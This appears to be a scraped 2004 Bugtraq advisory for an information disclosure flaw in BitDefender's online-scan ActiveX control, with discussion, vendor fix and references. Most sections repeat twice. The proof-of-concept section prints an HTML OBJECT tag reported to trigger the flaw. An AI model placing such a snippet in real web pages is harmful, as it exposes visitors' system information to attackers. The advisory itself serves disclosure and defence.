Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure Vulnerability
BID:10175
Info
Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure Vulnerability
| Bugtraq ID: | 10175 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 19 2004 12:00AM |
| Updated: | Apr 19 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to "Rafel Ivgi, The-Insider" <[email protected]>. |
| Vulnerable: |
Softwin BitDefender |
| Not Vulnerable: | |
Discussion
Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure Vulnerability
Reportedly the BitDefender AvxScanOnlineCtrl COM object is affected by an information disclosure vulnerability. This issue is due to a design error that allows a remote user to execute a method in the offending object that provides access to unauthorized information.
This issue would allow an attacker to gain access system information that may be used to aid in further attacks.
Reportedly the BitDefender AvxScanOnlineCtrl COM object is affected by an information disclosure vulnerability. This issue is due to a design error that allows a remote user to execute a method in the offending object that provides access to unauthorized information.
This issue would allow an attacker to gain access system information that may be used to aid in further attacks.
Exploit / POC
Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure Vulnerability
The following HTML code is reported to be sufficient to trigger this issue:
<OBJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
The following HTML code is reported to be sufficient to trigger this issue:
<OBJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
Solution / Fix
Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure Vulnerability
Solution:
Reportedly the vendor has updated the affected COM objects and ActiveX control. It has been advised that users with the affected software installed visit the BitDefender website and allow the update. Please see the referenced website for more information.
Solution:
Reportedly the vendor has updated the affected COM objects and ActiveX control. It has been advised that users with the affected software installed visit the BitDefender website and allow the update. Please see the referenced website for more information.
References
Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure Vulnerability
References:
References:
- BitDefender AntiVirus Scan Page (Softwin)
- BitDefender Scan Online(ActiveX) - Remote File Download & Execute & Private Info ("Rafel Ivgi, The-Insider"
)